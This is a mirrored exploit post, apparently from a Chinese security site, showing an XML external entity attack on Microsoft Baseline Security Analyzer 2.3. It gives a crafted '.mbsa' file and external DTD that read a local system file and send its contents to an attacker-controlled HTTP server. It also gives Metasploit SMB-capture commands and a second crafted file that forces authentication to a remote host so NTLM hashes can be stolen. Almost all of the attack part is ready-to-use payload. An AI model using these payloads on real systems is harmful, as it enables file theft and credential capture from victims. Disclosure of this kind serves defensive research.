首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection
来源:hyp3rlinx.altervista.org 作者:hyp3rlinx 发布时间:2018-09-11  
# Title: Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection
# Date: 2018-09-08
# Author: John Page (aka hyp3rlinx)
# Vendor: Microsoft
# Software link: https://www.microsoft.com/en-us/download/details.aspx?id=7558
# Software Version: 2.3
# References: ZDI-CAN-6307
# References: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-BASELINE-ANALYZER-v2.3-XML-INJECTION.txt
# References: hyp3rlinx.altervista.org
 
# Security Issue
# Microsoft Baseline Security Analyzer allows local files to be exfiltrated to a remote attacker
# controlled server if a user opens a specially crafted ".mbsa" file.
 
# Exploit/POC
 
# Install MBSA
# https://www.microsoft.com/en-us/download/details.aspx?id=7558
 
# 1) "evil.mbsa"
 
<?xml version="1.0"?>
<!DOCTYPE fileppe_fingerz [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
 
# 2) "payload.dtd"
 
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;
 
# When victim attempts open file they get prompted "Do you want to let this app
# make changes to your device?" However, it also indicates it is a "verified publisher" namely Microsoft.
# After opening the local users files can be exfiltrated to a remote server.
# Moreover, we can use this to steal NTLM hashes.
 
# Using Forced Authentication to steal NTLM hashes
 
# 2) msf > use auxiliary/server/capture/smb
# msf auxiliary(smb) > exploit -j
 
"evil.mbsa"
 
<?xml version="1.0"?>
<!DOCTYPE fileppe_fingerz [
<!ENTITY % dtd SYSTEM "\\192.168.114.153\unknwonfilez">
%dtd;]>
 
# Result: credentials captured by remote sever
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Photo To Video Converter Profe
·Flash Slideshow Maker Professi
·LW-N605R 12.20.2.1486 - Remote
·Any Sound Recorder 2.93 - Deni
·Socusoft 3GP Photo Slideshow 8
·Zenmap (Nmap) 7.70 - Denial of
·SocuSoft iPod Photo Slideshow
·phpMyAdmin Credential Stealer
·RPi Cam Control < 6.4.25 - 'pr
·Tor Browser 7.0.8 Information
·Apache Struts 2 Namespace Redi
·Easy File Sharing Web Server 6
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved